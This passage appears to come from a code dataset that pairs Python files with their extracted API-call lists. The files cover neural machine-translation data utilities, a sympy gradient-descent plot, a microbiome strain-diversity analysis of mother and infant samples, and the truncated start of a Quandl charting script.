SHARED_PATH = '/project/cq-training-1/project2/teams/team12/'
MAX_SEQ_LEN = 134 # Maximum sequence length of the aligned data
aligned_data = None
back_translated_data = None
def create_folder(path: str):
""" This function creates a folder if it does not already exists."""
if not os.path.exists(path):
os.mkdir(path)
def save_model(model: tf.keras.Model, name: str = None):
""" This function saves the model to disk."""
create_folder(SAVED_MODEL_DIR)
if name:
model_path = os.path.join(SAVED_MODEL_DIR, name)
else:
model_path = os.path.join(SAVED_MODEL_DIR, model.get_name())
create_folder(model_path)
model.save_weights(os.path.join(model_path, "model"))
def save_metrics(metrics, name):
"""Save metrics to disk"""
path = os.path.join(SAVED_MODEL_DIR, name)
pickle.dump(metrics, open(os.path.join(path, 'metrics.pkl'), 'wb'))
def create_fasttext_embedding_matrix(file_path: str, vocab: typing.Dict[str, int],
embedding_dim: int) -> typing.Dict[str, np.ndarray]:
"""Train a fasttext model and return the embeddings."""
model_path = os.path.join(SHARED_PATH, 'embedding_models', f'fasttext_model_dim_{embedding_dim}.bin')
if os.path.exists(model_path):
logger.info('Loading fasttext embeddings...')
model = fasttext.load_model(model_path)
else:
logger.info('Training fasttext embeddings...')
model = fasttext.train_unsupervised(file_path, model='skipgram', dim=embedding_dim)
model.save_model(model_path)
embedding_matrix = np.zeros((len(vocab), model.get_dimension()))
for word in vocab.keys():
idx = vocab[word]
if word in model.words:
embedding_matrix[idx] = model[word]
else:
pass # If word embedding is unknown, vector of zeros
return embedding_matrix
def create_vocab(file_path: str, vocab_size: int) -> typing.Dict[str, np.ndarray]:
"""Returns a dictionary that maps words to one hot embeddings"""
# Get sentences
sentences = get_sentences(file_path)
# Get words
words = []
for sentence in sentences:
words.extend(sentence)
# Get unique words
unique_words, word_counts = np.unique(words, return_counts=True)
sorted_unique_words = unique_words[np.argsort(word_counts)[::-1]]
if vocab_size is None:
vocab_size = len(sorted_unique_words)
if vocab_size > len(sorted_unique_words):
vocab_size = len(sorted_unique_words)
logger.info(f"vocab_size is too big. Using vocab_size = {vocab_size} ")
# Build vocabulary
word2idx = {word: i + 1 for i, word in enumerate(sorted_unique_words[:vocab_size])}
word2idx[PADDING_TOKEN] = 0
word2idx[UNKNOWN_TOKEN] = vocab_size + 1
idx2word = {i + 1: word for i, word in enumerate(sorted_unique_words[:vocab_size])}
idx2word[0] = PADDING_TOKEN
idx2word[vocab_size + 1] = UNKNOWN_TOKEN
return word2idx, idx2word
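# Resulting layout (descriptive note, the example words are illustrative): words are
# ranked by corpus frequency, index 0 is reserved for '<pad>' and vocab_size + 1
# for '<unk>', e.g.
#   word2idx = {'<pad>': 0, 'the': 1, 'of': 2, ..., '<unk>': vocab_size + 1}
# idx2word is the inverse mapping, used when decoding model outputs back to text.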
def get_sentences(file_path: str) -> typing.List[typing.List[str]]:
"""Reads file and returns the sentences."""
# Read file lines
with open(file_path, 'r') as f:
lines = f.readlines()
# Split on words
sentences = []
for line in lines:
line = text_preprocessing.process(line)
sentence = line.split()
if len(sentence) > MAX_SEQ_LEN:
sentence = sentence[:MAX_SEQ_LEN]
sentences.append(sentence)
return sentences
def sort(x, y=None):
""" Sort data according to len when using dynamic seq_len for efficient batching."""
idx = np.argsort([len(ip) for ip in x])[::-1]
if y == None:
return x[idx]
return x[idx], y[idx]
def load_data(path: str, vocab: typing.Dict[str, np.ndarray], seq_len: int = None) -> np.ndarray:
def sentence_to_vocab(sentences, vocab):
data = []
for i in range(len(sentences)):
sentence = []
for j in range(len(sentences[i])):
if seq_len is not None and j >= seq_len:
break
if sentences[i][j] in vocab:
sentence.append(vocab[sentences[i][j]])
else:
sentence.append(vocab[UNKNOWN_TOKEN])
data.append(np.array(sentence))
return np.array(data)
sentences = get_sentences(path)
data = sentence_to_vocab(sentences, vocab)
return data
def load_training_data(en_path: str,
fr_path: str,
vocab_en: typing.Dict[str, np.ndarray],
vocab_fr: typing.Dict[str, np.ndarray],
seq_len: int,
batch_size: int,
valid_ratio: float = 0.15,
fr_unaligned_path: str = None,
en_back_translated_path: str = None,
back_translation_ratio: float = 1.0) -> typing.Tuple[tf.data.Dataset, tf.data.Dataset]:
"""Returns train and valid datasets"""
# Global variables that hold the data to avoid reloading it multiple times when doing back-translation
# (We load a new training set each epoch when doing back-translation)
global aligned_data
global back_translated_data
# Build training data
if aligned_data is None:
train_X = load_data(en_path, vocab_en, seq_len)
train_y = load_data(fr_path, vocab_fr, seq_len)
aligned_data = (train_X, train_y)
else:
train_X, train_y = aligned_data
# Split in train and valid
cuttoff_idx = int(np.round(len(train_X) * (1 - valid_ratio)))
train_X, valid_X = train_X[:cuttoff_idx], train_X[cuttoff_idx:]
train_y, valid_y = train_y[:cuttoff_idx], train_y[cuttoff_idx:]
logger.debug(f'shape train_X : {train_X.shape}')
logger.debug(f'shape train_y : {train_y.shape}')
# Load back-translated data if available
if fr_unaligned_path is not None and en_back_translated_path is not None:
if back_translated_data is None:
back_translated_X = load_data(en_back_translated_path, vocab_en, seq_len)
unaligned_y = load_data(fr_unaligned_path, vocab_fr, seq_len)
back_translated_data = (back_translated_X, unaligned_y)
else:
back_translated_X, unaligned_y = back_translated_data
# Sample data according to back translation ratio
nb_examples = int(len(train_X) * back_translation_ratio)
sample = np.random.randint(0, len(back_translated_X), nb_examples)
back_translated_X = back_translated_X[sample]
unaligned_y = unaligned_y[sample]
train_X = np.concatenate((train_X, back_translated_X), axis=0)
train_y = np.concatenate((train_y, unaligned_y), axis=0)
logger.debug(f'shape train_X : {train_X.shape}')
logger.debug(f'shape train_y : {train_y.shape}')
if not seq_len:
train_X, train_y = sort(train_X, train_y)
valid_X, valid_y = sort(valid_X, valid_y)
train_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(train_X, train_y)],
output_types={'inputs':tf.int64, 'labels':tf.int64},
output_shapes={'inputs':tf.TensorShape([None]),
'labels':tf.TensorShape([None])})\
.shuffle(batch_size*3)\
.padded_batch(batch_size,
drop_remainder=False,
padded_shapes={'inputs':[seq_len], 'labels':[seq_len]})
valid_dataset = tf.data.Dataset.from_generator(lambda: [{'inputs':x,'labels':y} for x, y in zip(valid_X, valid_y)],
output_types={'inputs':tf.int64, 'labels':tf.int64},
output_shapes={'inputs':tf.TensorShape([None]),
'labels':tf.TensorShape([None])}) \
.padded_batch(batch_size,
drop_remainder=False,
padded_shapes={'inputs':[seq_len], 'labels':[seq_len]})
return train_dataset, valid_dataset, len(train_y), len(valid_y)
def generate_sentence(indices: typing.List[int], vocab: typing.Dict[int, str], ignore_unknown: bool = True) -> str:
"""Generate a sentence from a list of indices."""
sentence = ''
for idx in indices:
if int(idx) not in vocab:
print(f'idx {idx} not in vocab')
continue
elif vocab[idx] == PADDING_TOKEN \
or vocab[idx] == text_preprocessing.BOS:
continue
elif vocab[idx] == text_preprocessing.EOS:
break
sentence += vocab[int(idx)]
sentence += ' '
sentence = text_preprocessing.recapitalize(sentence)
return sentence
def generate_sentence_from_probabilities(probs: typing.List[np.ndarray],
vocab: typing.Dict[int, str],
ignore_unknown: bool = True) -> str:
"""Generate a sentence from a list of probability vector."""
indices = np.argmax(probs, axis=1).astype('int')
sentence = ''
for i, idx in enumerate(indices):
if int(idx) not in vocab:
print(f'idx {idx} not in vocab')
continue
if vocab[idx] == UNKNOWN_TOKEN and ignore_unknown:
idx = int(np.argsort(probs[i])[-2]) # Take the second biggest prob
if vocab[idx] == PADDING_TOKEN \
or vocab[idx] == text_preprocessing.BOS:
continue
elif vocab[idx] == text_preprocessing.EOS:
break
sentence += vocab[int(idx)]
sentence += ' '
sentence = text_preprocessing.recapitalize(sentence)
return sentence
# Code from : https://www.tensorflow.org/tutorials/text/transformer
class CustomSchedule(tf.keras.optimizers.schedules.LearningRateSchedule):
"""Custom learning rate scheduler for the transformer."""
def __init__(self, d_model, warmup_steps=4000):
super(CustomSchedule, self).__init__()
self.d_model = d_model
self.d_model = tf.cast(self.d_model, tf.float32)
self.warmup_steps = warmup_steps
def __call__(self, step):
arg1 = tf.math.rsqrt(step)
arg2 = step * (self.warmup_steps**-1.5)
return tf.math.rsqrt(self.d_model) * tf.math.minimum(arg1, arg2)
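# The schedule above implements the learning rate from "Attention Is All You Need"
# (also used in the TensorFlow transformer tutorial cited above):
#   lrate = d_model**-0.5 * min(step**-0.5, step * warmup_steps**-1.5)
# i.e. a linear warm-up over the first warmup_steps steps followed by an
# inverse-square-root decay.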
|
[
"os.mkdir",
"os.path.join",
"numpy.concatenate",
"numpy.argmax",
"fasttext.train_unsupervised",
"os.path.exists",
"utils.text_preprocessing.process",
"tensorflow.TensorShape",
"numpy.argsort",
"tensorflow.cast",
"fasttext.load_model",
"numpy.array",
"utils.text_preprocessing.recapitalize",
"utils.logging.getLogger",
"tensorflow.math.minimum",
"numpy.unique",
"tensorflow.math.rsqrt"
] |
[((172, 191), 'utils.logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (189, 191), False, 'from utils import logging\n'), ((1067, 1102), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (1079, 1102), False, 'import os\n'), ((1428, 1520), 'os.path.join', 'os.path.join', (['SHARED_PATH', '"""embedding_models"""', 'f"""fasttext_model_dim_{embedding_dim}.bin"""'], {}), "(SHARED_PATH, 'embedding_models',\n f'fasttext_model_dim_{embedding_dim}.bin')\n", (1440, 1520), False, 'import os\n'), ((1525, 1551), 'os.path.exists', 'os.path.exists', (['model_path'], {}), '(model_path)\n', (1539, 1551), False, 'import os\n'), ((2529, 2565), 'numpy.unique', 'np.unique', (['words'], {'return_counts': '(True)'}), '(words, return_counts=True)\n', (2538, 2565), True, 'import numpy as np\n'), ((9287, 9328), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (9318, 9328), False, 'from utils import text_preprocessing\n'), ((10248, 10289), 'utils.text_preprocessing.recapitalize', 'text_preprocessing.recapitalize', (['sentence'], {}), '(sentence)\n', (10279, 10289), False, 'from utils import text_preprocessing\n'), ((564, 584), 'os.path.exists', 'os.path.exists', (['path'], {}), '(path)\n', (578, 584), False, 'import os\n'), ((594, 608), 'os.mkdir', 'os.mkdir', (['path'], {}), '(path)\n', (602, 608), False, 'import os\n'), ((787, 822), 'os.path.join', 'os.path.join', (['SAVED_MODEL_DIR', 'name'], {}), '(SAVED_MODEL_DIR, name)\n', (799, 822), False, 'import os\n'), ((955, 988), 'os.path.join', 'os.path.join', (['model_path', '"""model"""'], {}), "(model_path, 'model')\n", (967, 988), False, 'import os\n'), ((1623, 1654), 'fasttext.load_model', 'fasttext.load_model', (['model_path'], {}), '(model_path)\n', (1642, 1654), False, 'import fasttext\n'), ((1736, 1811), 'fasttext.train_unsupervised', 'fasttext.train_unsupervised', (['file_path'], {'model': '"""skipgram"""', 'dim': 'embedding_dim'}), "(file_path, model='skipgram', dim=embedding_dim)\n", (1763, 1811), False, 'import fasttext\n'), ((3550, 3582), 'utils.text_preprocessing.process', 'text_preprocessing.process', (['line'], {}), '(line)\n', (3576, 3582), False, 'from utils import text_preprocessing\n'), ((4589, 4603), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (4597, 4603), True, 'import numpy as np\n'), ((6929, 6981), 'numpy.concatenate', 'np.concatenate', (['(train_X, back_translated_X)'], {'axis': '(0)'}), '((train_X, back_translated_X), axis=0)\n', (6943, 6981), True, 'import numpy as np\n'), ((7000, 7046), 'numpy.concatenate', 'np.concatenate', (['(train_y, unaligned_y)'], {'axis': '(0)'}), '((train_y, unaligned_y), axis=0)\n', (7014, 7046), True, 'import numpy as np\n'), ((10671, 10704), 'tensorflow.cast', 'tf.cast', (['self.d_model', 'tf.float32'], {}), '(self.d_model, tf.float32)\n', (10678, 10704), True, 'import tensorflow as tf\n'), ((10793, 10812), 'tensorflow.math.rsqrt', 'tf.math.rsqrt', (['step'], {}), '(step)\n', (10806, 10812), True, 'import tensorflow as tf\n'), ((1133, 1166), 'os.path.join', 'os.path.join', (['path', '"""metrics.pkl"""'], {}), "(path, 'metrics.pkl')\n", (1145, 1166), False, 'import os\n'), ((2605, 2628), 'numpy.argsort', 'np.argsort', (['word_counts'], {}), '(word_counts)\n', (2615, 2628), True, 'import numpy as np\n'), ((9653, 9677), 'numpy.argmax', 'np.argmax', (['probs'], {'axis': '(1)'}), '(probs, axis=1)\n', (9662, 9677), True, 'import numpy as np\n'), ((10877, 10904), 'tensorflow.math.rsqrt', 
'tf.math.rsqrt', (['self.d_model'], {}), '(self.d_model)\n', (10890, 10904), True, 'import tensorflow as tf\n'), ((10907, 10934), 'tensorflow.math.minimum', 'tf.math.minimum', (['arg1', 'arg2'], {}), '(arg1, arg2)\n', (10922, 10934), True, 'import tensorflow as tf\n'), ((4554, 4572), 'numpy.array', 'np.array', (['sentence'], {}), '(sentence)\n', (4562, 4572), True, 'import numpy as np\n'), ((9929, 9949), 'numpy.argsort', 'np.argsort', (['probs[i]'], {}), '(probs[i])\n', (9939, 9949), True, 'import numpy as np\n'), ((8283, 8305), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8297, 8305), True, 'import tensorflow as tf\n'), ((8375, 8397), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (8389, 8397), True, 'import tensorflow as tf\n'), ((7575, 7597), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7589, 7597), True, 'import tensorflow as tf\n'), ((7675, 7697), 'tensorflow.TensorShape', 'tf.TensorShape', (['[None]'], {}), '([None])\n', (7689, 7697), True, 'import tensorflow as tf\n')]
|
import matplotlib.pyplot as plt
from sympy import symbols,diff
#from mpl_toolkits.mplot3d.axes3d import Axes3D
from matplotlib import cm
import numpy as np
def f(x,y):
r=3**(-x*x -y*y)
return 1/(r+1)
def doFit():
a, b = symbols('x, y')
multiplier = 0.1
max_iter = 900
params = np.array([-3.0, 1.0])
print("DiffX = ",diff(f(a, b), a))
print("DiffX = ", diff(f(a, b), b))
for n in range(max_iter):
gradient_x = diff(f(a, b), a).evalf(subs={a: params[0], b: params[1]})
gradient_y = diff(f(a, b), b).evalf(subs={a: params[0], b: params[1]})
gradients = np.array([gradient_x, gradient_y])
params = params - multiplier * gradients
print("Gardients = ", gradients)
print("Params = ", params)
print("Function at min = ", f(params[0], params[1]))
error=0.00001
x=np.linspace(start=-2,stop=2,num=200)
y=np.linspace(start=-2,stop=2,num=200)
x,y=np.meshgrid(x,y)
print(x,y)
doFit()
fig=plt.figure(figsize=(16,12))
ax=fig.gca(projection='3d')
ax.set_xlabel("X",fontsize=20)
ax.set_ylabel("Y",fontsize=20)
ax.set_zlabel("Z",fontsize=20)
ax.plot_surface(x,y,f(x,y),cmap=cm.hot,alpha=0.5)
plt.show()
|
[
"sympy.symbols",
"numpy.meshgrid",
"matplotlib.pyplot.show",
"matplotlib.pyplot.figure",
"numpy.array",
"numpy.linspace"
] |
[((838, 876), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (849, 876), True, 'import numpy as np\n'), ((877, 915), 'numpy.linspace', 'np.linspace', ([], {'start': '(-2)', 'stop': '(2)', 'num': '(200)'}), '(start=-2, stop=2, num=200)\n', (888, 915), True, 'import numpy as np\n'), ((918, 935), 'numpy.meshgrid', 'np.meshgrid', (['x', 'y'], {}), '(x, y)\n', (929, 935), True, 'import numpy as np\n'), ((958, 986), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(16, 12)'}), '(figsize=(16, 12))\n', (968, 986), True, 'import matplotlib.pyplot as plt\n'), ((1157, 1167), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1165, 1167), True, 'import matplotlib.pyplot as plt\n'), ((234, 249), 'sympy.symbols', 'symbols', (['"""x, y"""'], {}), "('x, y')\n", (241, 249), False, 'from sympy import symbols, diff\n'), ((303, 324), 'numpy.array', 'np.array', (['[-3.0, 1.0]'], {}), '([-3.0, 1.0])\n', (311, 324), True, 'import numpy as np\n'), ((612, 646), 'numpy.array', 'np.array', (['[gradient_x, gradient_y]'], {}), '([gradient_x, gradient_y])\n', (620, 646), True, 'import numpy as np\n')]
|
from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils
import pylab, sys, numpy as np, random, math
from utils import temporal_changes_utils
from collections import defaultdict
import bz2
import pickle
adir = config.analysis_directory
ddir = config.data_directory
pdir = "%s/pickles" % config.data_directory
# Load species list
good_species_list = parse_midas_data.load_pickled_good_species_list()
# =================================================================
# Load QP, polymorphism, alpha diversity info
sample_species_qp_dict = pickle.load(open("%s/sample_species_qp_dict.pkl" % pdir, 'rb'))
num_qp_dict = pickle.load(open("%s/plot_qp/num_qp_dict_binned.pkl" % pdir, 'rb'))
num_non_dict = pickle.load(open("%s/plot_qp/num_non_dict_binned.pkl" % pdir, 'rb'))
num_lowcov_dict = pickle.load(open("%s/plot_qp/num_lowcov_dict_binned.pkl" % pdir, 'rb'))
sample_species_polymorphism_dict = pickle.load(open("%s/sample_species_polymorphism_dict.pkl" % (pdir), 'rb'))
alpha_div_dict = pickle.load(open("%s/alpha_div_dict.pkl" % pdir, 'rb'))
# =================================================================
# =================================================================
# Load polymorphism (common and rare pS) info
sample_species_common_pS_dict = defaultdict(dict)
sample_species_rare_pS_dict = defaultdict(dict)
sample_species_seg_pS_dict = defaultdict(dict)
type, type_desc = 'common', '0.2-0.5'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
            # Fraction of all synonymous sites with minor allele frequency 0.2-0.5 ('common')
sample_species_common_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
type, type_desc = 'rare', '0-0.05 (excl. 0)'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
            # Fraction of all synonymous sites with minor allele frequency 0-0.05, excluding 0 ('rare')
sample_species_rare_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
type, type_desc = 'seg', '>0'
within_total_sites_nonQP = pickle.load(open("%s/within_total_sites_%s_nonQP.pkl" % (pdir, type), 'rb'))
within_total_sites_QP = pickle.load(open("%s/within_total_sites_%s_QP.pkl" % (pdir, type), 'rb'))
for within_total_sites_dict in [within_total_sites_QP, within_total_sites_nonQP]:
for sample in within_total_sites_dict:
for species in within_total_sites_dict[sample]:
w1D, t1D, w4D, t4D = within_total_sites_dict[sample][species]
            # Fraction of all synonymous sites with minor allele frequency > 0 (segregating)
sample_species_seg_pS_dict[sample][species] = (w4D*1.0 + 1.0)/(t4D + 1.0)
if sample_species_seg_pS_dict[sample][species] > 0.7:
print(sample + ", " + species)
print(within_total_sites_dict[sample][species])
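# Descriptive note: each of the three blocks above computes, per (sample, species),
# a pseudocount-smoothed fraction of synonymous (fourfold-degenerate, 4D) sites that
# are polymorphic in the given minor-allele-frequency range:
#   pS = (w4D + 1.0) / (t4D + 1.0)
# where w4D is the number of within-host polymorphic 4D sites in that frequency bin
# and t4D is the total number of 4D sites considered.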
# =================================================================
# QP: aggregate over species for each timepoint
mi_tp_sample_dict, infant_tps_ordered = su.get_mi_tp_sample_dict(exclude_cohorts = ['olm'], binned = True)
mother_tps_ordered = sorted(mi_tp_sample_dict['mother'].keys())
tps_ordered_dict = {'mother': mother_tps_ordered, 'infant': infant_tps_ordered}
num_qp_agg_species = {'infant': [], 'mother': []}
num_non_agg_species = {'infant': [], 'mother': []}
num_lowcov_agg_species = {'infant': [], 'mother': []}
for cat in ['mother', 'infant']:
for tp in tps_ordered_dict[cat]:
if len(mi_tp_sample_dict[cat][tp]) < 10:
continue # Skip timepoints with not enough data
total_num_qp, total_num_non, total_num_lowcov = 0, 0, 0
for species in good_species_list:
total_num_qp += num_qp_dict[cat][species][tp]
total_num_non += num_non_dict[cat][species][tp]
total_num_lowcov += num_lowcov_dict[cat][species][tp]
num_qp_agg_species[cat].append(total_num_qp)
num_non_agg_species[cat].append(total_num_non)
num_lowcov_agg_species[cat].append(total_num_lowcov)
# QP: Get proportion QP for each sample
num_qp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)}
num_nonqp_sample = {'infant': defaultdict(int), 'mother': defaultdict(int)}
for cat in ['mother', 'infant']:
for sample in sample_species_qp_dict[cat]:
for species in sample_species_qp_dict[cat][sample]:
qp_status = sample_species_qp_dict[cat][sample][species]
if qp_status == 'qp':
num_qp_sample[cat][sample] += 1
if qp_status == 'non-qp':
num_nonqp_sample[cat][sample] += 1
prop_nonqp_sample = {'infant': [], 'mother': []}
for cat in ['mother', 'infant']:
for tp in tps_ordered_dict[cat]:
num_samples = len(mi_tp_sample_dict[cat][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
prop_nonqp_sample_tp = []
for sample in mi_tp_sample_dict[cat][tp]:
if sample in num_qp_sample[cat]:
num_qp = num_qp_sample[cat][sample]
num_nonqp = num_nonqp_sample[cat][sample]
num_highcov = num_qp + num_nonqp
if num_highcov >= 3:
prop_nonqp = float(num_nonqp) / num_highcov
prop_nonqp_sample_tp.append(prop_nonqp)
else:
print("%s: Not enough high coverage species!" % sample)
prop_nonqp_sample[cat].append(prop_nonqp_sample_tp)
# Plot time!
import numpy as np
from matplotlib import pyplot as plt
# =======================================================================
# Alpha diversity boxplot (all non-Olm infants) on top
# QP proportion on bottom
# =======================================================================
alpha_divs = [] # list of sample values for each tp
common_pSs = [] # list of sample values for each tp
rare_pSs = [] # list of sample values for each tp
seg_pSs = [] # list of sample values for each tp
labels = ['M:-3m', 'M:dlv', 'M:1d', 'M:2d', 'M:3m']
for i in range(len(mother_tps_ordered)):
tp = mother_tps_ordered[i]
num_samples = len(mi_tp_sample_dict['mother'][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
labels[i] += ("\nn=%i" % num_samples)
alpha_divs_tp = []
common_pSs_tp = []
rare_pSs_tp = []
seg_pSs_tp = []
for sample in mi_tp_sample_dict['mother'][tp]:
alpha_divs_tp.append(alpha_div_dict[sample])
common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]]
rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]]
seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]]
alpha_divs.append(alpha_divs_tp)
common_pSs.append(common_pSs_tp)
rare_pSs.append(rare_pSs_tp)
seg_pSs.append(seg_pSs_tp)
for tp in infant_tps_ordered:
num_samples = len(mi_tp_sample_dict['infant'][tp])
if num_samples < 10:
continue # Skip timepoints with not enough data
labels.append(tp + "\n" + ("n=%i" % num_samples))
alpha_divs_tp = []
common_pSs_tp = []
rare_pSs_tp = []
seg_pSs_tp = []
for sample in mi_tp_sample_dict['infant'][tp]:
alpha_divs_tp.append(alpha_div_dict[sample])
common_pSs_tp += [sample_species_common_pS_dict[sample][species] for species in sample_species_common_pS_dict[sample]]
rare_pSs_tp += [sample_species_rare_pS_dict[sample][species] for species in sample_species_rare_pS_dict[sample]]
seg_pSs_tp += [sample_species_seg_pS_dict[sample][species] for species in sample_species_seg_pS_dict[sample]]
alpha_divs.append(alpha_divs_tp)
common_pSs.append(common_pSs_tp)
rare_pSs.append(rare_pSs_tp)
seg_pSs.append(seg_pSs_tp)
num_qp_infant = np.array(num_qp_agg_species['infant'])
num_non_infant = np.array(num_non_agg_species['infant'])
qp_props_infant = num_qp_infant/(num_non_infant + num_qp_infant).astype('float') # one value for each tp
num_qp_mother = np.array(num_qp_agg_species['mother'])
num_non_mother = np.array(num_non_agg_species['mother'])
qp_props_mother = num_qp_mother/(num_non_mother + num_qp_mother).astype('float') # one value for each tp
'''
num_qp = np.array(num_qp_agg_species['mother'] + num_qp_agg_species['infant'])
num_non = np.array(num_non_agg_species['mother'] + num_non_agg_species['infant'])
qp_props = num_qp/(num_non + num_qp).astype('float') # one value for each tp
'''
xticks = np.arange(len(labels))
fig, ax = plt.subplots(3, 1, figsize=(18, 12), sharex=True)
fig.subplots_adjust(wspace=0.02, hspace=0.02)
ax[0].boxplot(alpha_divs)
ax[0].set_ylabel("Shannon alpha diversity\nper sample")
ax[0].set_title("Alpha diversity, proportion of non-QP samples, polymorphism by timepoint (infants exclude Olm)")
ax[0].axvline(5.5, color='gray', linestyle='-')
# QP ===================================================================
ax[1].plot(xticks[:5] + 1, 1-qp_props_mother, 'r.-')
ax[1].plot(xticks[5:] + 1, 1-qp_props_infant, 'g.-')
ax[1].set_ylabel("Prop. of high coverage samples\nwhich are non-QP")
ax[1].axvline(5.5, color='gray', linestyle='-')
'''
ax[1].boxplot(prop_nonqp_sample['mother'], positions=(xticks[:5] + 1))
ax[1].boxplot(prop_nonqp_sample['infant'], positions=(xticks[5:] + 1))
ax[1].set_ylabel("Prop. of high coverage species in a sample\nwhich are non-QP")
ax[1].axvline(5.5, color='gray', linestyle='-')
'''
# ======================================================================
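# three offset boxplot groups per timepoint: segregating (pink), common (light blue) and rare (light green) pS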
bplot_s = ax[2].boxplot(seg_pSs, patch_artist=True, widths=0.16, positions=(xticks+0.75))
for patch in bplot_s['boxes']:
patch.set_facecolor('pink')
bplot_c = ax[2].boxplot(common_pSs, patch_artist=True, widths=0.16, positions=(xticks+1))
for patch in bplot_c['boxes']:
patch.set_facecolor('lightblue')
bplot_r = ax[2].boxplot(rare_pSs, patch_artist=True, widths=0.16, positions=(xticks+1.25))
for patch in bplot_r['boxes']:
patch.set_facecolor('lightgreen')
ax[2].set_yscale('log')
ax[2].set_ylabel("Polymorphism (pS)\nper sample-species pair")
ax[2].set_xlim((0, 24))
ax[2].set_xticks(xticks + 1)
ax[2].set_xticklabels(labels, fontsize=11)
ax[2].set_xlabel("Timepoint")
ax[2].axvline(5.5, color='gray', linestyle='-')
ax[1].legend([bp["boxes"][0] for bp in [bplot_s, bplot_c, bplot_r]], ['any (MAF >0)', 'common (MAF >0.2)', 'rare (MAF <0.05)'], loc='lower right')
fig.savefig("%s/alpha_div-prop_qp-polymorphism_over_time_v3.pdf" % config.analysis_directory, bbox_inches='tight')
|
[
"utils.parse_midas_data.load_pickled_good_species_list",
"collections.defaultdict",
"numpy.array",
"utils.sample_utils.get_mi_tp_sample_dict",
"matplotlib.pyplot.subplots"
] |
[((382, 431), 'utils.parse_midas_data.load_pickled_good_species_list', 'parse_midas_data.load_pickled_good_species_list', ([], {}), '()\n', (429, 431), False, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((1292, 1309), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1303, 1309), False, 'from collections import defaultdict\n'), ((1340, 1357), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1351, 1357), False, 'from collections import defaultdict\n'), ((1387, 1404), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1398, 1404), False, 'from collections import defaultdict\n'), ((3598, 3660), 'utils.sample_utils.get_mi_tp_sample_dict', 'su.get_mi_tp_sample_dict', ([], {'exclude_cohorts': "['olm']", 'binned': '(True)'}), "(exclude_cohorts=['olm'], binned=True)\n", (3622, 3660), True, 'from utils import sample_utils as su, config, parse_midas_data, stats_utils, sfs_utils\n'), ((8104, 8142), 'numpy.array', 'np.array', (["num_qp_agg_species['infant']"], {}), "(num_qp_agg_species['infant'])\n", (8112, 8142), True, 'import numpy as np\n'), ((8160, 8199), 'numpy.array', 'np.array', (["num_non_agg_species['infant']"], {}), "(num_non_agg_species['infant'])\n", (8168, 8199), True, 'import numpy as np\n'), ((8322, 8360), 'numpy.array', 'np.array', (["num_qp_agg_species['mother']"], {}), "(num_qp_agg_species['mother'])\n", (8330, 8360), True, 'import numpy as np\n'), ((8378, 8417), 'numpy.array', 'np.array', (["num_non_agg_species['mother']"], {}), "(num_non_agg_species['mother'])\n", (8386, 8417), True, 'import numpy as np\n'), ((8814, 8863), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(3)', '(1)'], {'figsize': '(18, 12)', 'sharex': '(True)'}), '(3, 1, figsize=(18, 12), sharex=True)\n', (8826, 8863), True, 'from matplotlib import pyplot as plt\n'), ((4609, 4625), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4620, 4625), False, 'from collections import defaultdict\n'), ((4637, 4653), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4648, 4653), False, 'from collections import defaultdict\n'), ((4685, 4701), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4696, 4701), False, 'from collections import defaultdict\n'), ((4713, 4729), 'collections.defaultdict', 'defaultdict', (['int'], {}), '(int)\n', (4724, 4729), False, 'from collections import defaultdict\n')]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
QUANDLKEY = '<ENTER YOUR QUANDLKEY HERE>'
"""
Created on Thu Oct 25 23:19:44 2018
@author: jeff
"""
'''*************************************
#1. Import libraries and key varable values
'''
import quandl
import plotly
import plotly.graph_objs as go
import numpy as np
from datetime import datetime
try:
import Image
except ImportError:
